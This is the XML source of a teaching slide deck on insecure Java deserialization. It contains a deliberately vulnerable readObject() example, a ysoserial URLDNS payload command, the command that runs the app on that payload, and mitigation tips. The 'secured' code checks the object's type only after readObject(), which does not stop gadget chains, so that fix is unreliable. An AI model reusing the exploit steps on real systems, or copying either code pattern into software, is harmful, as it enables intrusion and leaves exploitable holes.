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Inter" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId18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610" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="50" d="100"/>
          <a:sy n="50" d="100"/>
        </p:scale>
        <p:origin x="547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20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18949"/>
            <a:ext cx="130428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Insecure Java Deserialization: Exploitation and Mitigation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484763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Coding| Nour Amri | 25/11/2024</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750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230F796-4D65-423E-84FC-9D1BD8DF84DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="276447" y="7740422"/>
            <a:ext cx="14141302" cy="3629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04123"/>
            <a:ext cx="130428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Understanding Serialization and Deserialization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455961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Serialization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51585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Converting objects to byte streams for storage or transfer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55961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Deserialization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7599521" y="51585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Reconstructing objects from byte streams</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750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7422784-EE6E-4478-9B8D-92E8CDD6D03E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="276447" y="7740422"/>
            <a:ext cx="14141302" cy="3629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8363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7345" y="2907983"/>
            <a:ext cx="5914430" cy="6256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Vulnerable Code Example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667345" y="3819644"/>
            <a:ext cx="13295709" cy="2727246"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2937"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CCEEFF"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Shape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="657820" y="3819644"/>
            <a:ext cx="13314759" cy="2727246"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1049"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CCEEFF"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="848439" y="3962638"/>
            <a:ext cx="12933521" cy="24412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class VulnerableApp {
    public static void main(String[] args) {
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(args[0]));
        Object obj = ois.readObject(); // Unsafe deserialization
        System.out.println("Deserialized object: " + obj);
    }
}
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667345" y="6975753"/>
            <a:ext cx="333613" cy="333613"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2400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191578" y="6975753"/>
            <a:ext cx="2758440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Unsafe readObject() call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1191578" y="7402830"/>
            <a:ext cx="602837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validation of deserialized data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7410569" y="6975753"/>
            <a:ext cx="333613" cy="333613"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2400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934801" y="6975753"/>
            <a:ext cx="4081224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Potential for remote code execution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7934801" y="7402830"/>
            <a:ext cx="602837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Attacker can inject malicious objects</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500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B76222B-A6D0-4C7A-ADA0-8C08400311DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="244548" y="7822287"/>
            <a:ext cx="14141302" cy="3629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3769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0565" y="3095982"/>
            <a:ext cx="5509855" cy="666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Generating the Exploit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710565" y="4066580"/>
            <a:ext cx="13209270" cy="953929"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 8939"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CCEEFF"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Shape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700445" y="4066580"/>
            <a:ext cx="13229511" cy="953929"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3192"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CCEEFF"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="903446" y="4218742"/>
            <a:ext cx="12823508" cy="649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 --add-opens java.base/java.net=ALL-UNNAMED -jar ysoserial-all.jar URLDNS "http://example.com" &gt; payload.ser
</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="15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65" y="5248870"/>
            <a:ext cx="4403050" cy="81200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13567" y="6365319"/>
            <a:ext cx="2664619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Create Payload</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913567" y="6820138"/>
            <a:ext cx="3997047" cy="649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ysoserial to generate malicious object</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="15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615" y="5248870"/>
            <a:ext cx="4403050" cy="81200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316617" y="6365319"/>
            <a:ext cx="2664619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Serialize Object</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5316617" y="6820138"/>
            <a:ext cx="3997047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Convert to byte stream (payload.ser)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="15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6666" y="5248870"/>
            <a:ext cx="4403050" cy="81200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719667" y="6365319"/>
            <a:ext cx="2664619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Exploit Vulnerability</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9719667" y="6820138"/>
            <a:ext cx="3997047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Trigger DNS request on deserialization</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1550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C8EC312-9549-44CC-BD89-4392F2097EFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="276447" y="7740422"/>
            <a:ext cx="14141302" cy="3629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60615"/>
            <a:ext cx="10356056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Exploiting the Vulnerable Application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3145036"/>
            <a:ext cx="13042821" cy="1065848"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 8938"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CCEEFF"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Shape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="782479" y="3145036"/>
            <a:ext cx="13065443" cy="1065848"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3192"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CCEEFF"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1009293" y="3315057"/>
            <a:ext cx="126118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 -cp .;commons-collections-3.2.2.jar VulnerableApp payload.ser
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93790" y="4466034"/>
            <a:ext cx="4196358" cy="1702832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028224" y="4700468"/>
            <a:ext cx="3257431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Execute Vulnerable App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1028224" y="5208627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Java application with malicious payload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16962" y="4466034"/>
            <a:ext cx="4196358" cy="1702832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451396" y="470046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Trigger Exploit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5451396" y="5208627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DNS query to example.com is executed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4466034"/>
            <a:ext cx="4196358" cy="1702832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9874568" y="470046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Potential Impact</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9874568" y="5208627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Remote code execution, data leakage, DoS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750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89BDF5B-8FEE-4B87-887B-463226E8E7F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="276447" y="7740422"/>
            <a:ext cx="14141302" cy="3629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0329" y="573762"/>
            <a:ext cx="9837658" cy="6847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Secured Code - Fixing the Vulnerability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730329" y="1571387"/>
            <a:ext cx="13169741" cy="4319111"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2029"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CCEEFF"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Shape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="719971" y="1571387"/>
            <a:ext cx="13190458" cy="4319111"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 725"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CCEEFF"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="928568" y="1727835"/>
            <a:ext cx="12773263" cy="40062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class SecureApp {
    public static void main(String[] args) {
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(args[0]));
        Object obj = ois.readObject();
        if (obj instanceof String) {
            System.out.println("Deserialized safe object: " + obj);
        } else {
            System.out.println("Untrusted object detected! Aborting.");
        }
    }
}
</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="16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29" y="6125170"/>
            <a:ext cx="521613" cy="521613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30329" y="6855381"/>
            <a:ext cx="2738795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Input Validation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2150" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="730329" y="7322820"/>
            <a:ext cx="4181237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Check object type before processing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="16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462" y="6125170"/>
            <a:ext cx="521613" cy="52161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224462" y="6855381"/>
            <a:ext cx="2738795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Whitelist Approach</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2150" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5224462" y="7322820"/>
            <a:ext cx="4181356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Allow only trusted object types</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="16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8715" y="6125170"/>
            <a:ext cx="521613" cy="521613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718715" y="6855381"/>
            <a:ext cx="2738795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Error Handling</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2150" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9718715" y="7322820"/>
            <a:ext cx="4181237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Abort on detection of untrusted objects</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600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47DCAC9-CCB3-482A-8020-E575D624ABED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="276447" y="7740422"/>
            <a:ext cx="14141302" cy="3629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63122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Mitigation Strategies</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4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361009"/>
            <a:ext cx="2152055" cy="132468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3713" y="2961203"/>
            <a:ext cx="12132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58782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Validate Input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5357217" y="3095982"/>
            <a:ext cx="35369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whitelisting for trusted types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698796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B2D4E5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742373"/>
            <a:ext cx="4304109" cy="132468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73949" y="4177903"/>
            <a:ext cx="16073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396918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Use Safer Formats</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6433304" y="4477345"/>
            <a:ext cx="476392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Prefer JSON or XML over native serialization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080159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B2D4E5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123736"/>
            <a:ext cx="6456164" cy="132468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74068" y="5559266"/>
            <a:ext cx="16049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350550"/>
            <a:ext cx="3550801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Avoid Native Serialization</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7509272" y="5858708"/>
            <a:ext cx="355080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Don't use for untrusted data</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="67035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these strategies to significantly reduce the risk of deserialization vulnerabilities in your Java applications.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247</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Personnalisé</PresentationFormat>
  <Paragraphs>55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Petrona Bold</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Inter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nour amri</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-11-25T05:40:50Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-11-25T14:40:18Z</dcterms:modified>
</cp:coreProperties>
</file>